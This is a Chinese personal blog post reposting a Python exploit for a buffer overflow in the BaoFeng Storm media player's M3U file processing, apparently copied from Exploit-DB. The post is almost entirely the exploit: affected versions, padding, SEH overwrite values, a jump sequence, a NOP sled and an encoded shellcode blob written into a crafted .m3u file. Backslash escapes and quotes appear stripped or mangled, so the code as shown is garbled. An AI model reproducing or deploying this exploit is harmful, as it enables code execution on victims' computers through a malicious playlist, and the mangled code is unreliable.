夜火博客 个人的碎碎念收集箱

暴风影音的最新0DAY M3U缓冲区溢出漏洞利用工具exploit

暴风影音的最新0DAY M3U缓冲区溢出漏洞利用工具

# Title: BaoFeng Storm M3U File Processing Buffer Overflow Exploit
# EDB-ID: 12516
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Lufeng Li and Qingshan Li
# Published: 2010-05-06
# Verified: no
# Download Exploit Code
# Download N/A

view sourceprint?#!/usr/bin/env python

#################################################################

#

# Title: BaoFeng Storm M3U File Processing Buffer Overflow Exploit

# CNVD-ID: CNVD-2010-00752

# Author: Lufeng Li and Qingshan Li of Neusoft Corporation

# Download: www.baofeng.com

# Test: Put m3u file in root(e.g. c:/ d:/),and open this m3u file

# Platform: Windows XPSP3 Chinese Simplified

# Vulnerable: Storm2012 3.10.4.21

# Storm2012 3.10.4.16

# Storm2012 3.10.4.8

# Storm2012 3.10.3.17

# Storm2012 3.10.2.5

# Storm2012 3.10.1.12

#################################################################

# Code :

file= “baofeng.m3u

junk =”x41″*795

nseh=”x61xe8xe1″

seh=”xaaxd7x40″

jmp =”x53x53x6dx58x6dx05x11x22x6dx2dx10x22x6dxacxe4″

nops =”x42″ * 110

shellcode=(“PPYAIAIAIAIAQATAXAZAPA3QADAZA”

“BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA”

“58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB”

“AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K”

“22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL”

“MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55″

“Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V”

“NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB”

“R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT”

“NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU”

“89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM”

“KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC”

“QQ2LRCM0LJA”)

fobj=open(file,”w”)

payload=junk+nseh+seh+jmp+nops+shellcode

fobj.write(payload)

fobj.close()

via neeao

留言列表
www.bjdy88.com
www.bjdy88.com 文章不错,顶起  回复
发表评论
来宾的头像